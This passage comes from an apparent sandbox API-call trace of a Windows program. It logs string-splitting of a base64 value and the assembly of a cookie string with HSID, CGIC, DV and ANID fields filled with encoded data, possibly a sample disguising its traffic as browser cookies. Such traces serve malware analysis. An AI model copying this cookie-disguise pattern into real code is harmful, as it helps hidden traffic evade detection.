(lpStr="JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 37 [0143.800] StrSpnA (psz="/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 2 [0143.800] StrSpnA (psz="+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 3 [0143.800] StrSpnA (psz="+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 5 [0143.800] StrSpnA (psz="/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 48 [0143.800] StrSpnA (psz="/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 16 [0143.800] StrSpnA (psz="+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 17 [0143.800] StrSpnA (psz="+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 12 [0143.800] StrSpnA (psz="/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 30 [0143.800] StrSpnA (psz="+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.800] StrCSpnA (lpStr="iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 68 [0143.800] StrSpnA (psz="==", pszSet="+/=") returned 2 [0143.801] lstrlenA (lpString="yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D") returned 372 [0143.801] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;", lpString2="ANID" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID" [0143.801] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID", lpString2="=" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=" [0143.801] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=", lpString2="yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D" [0143.801] lstrcatA (in: 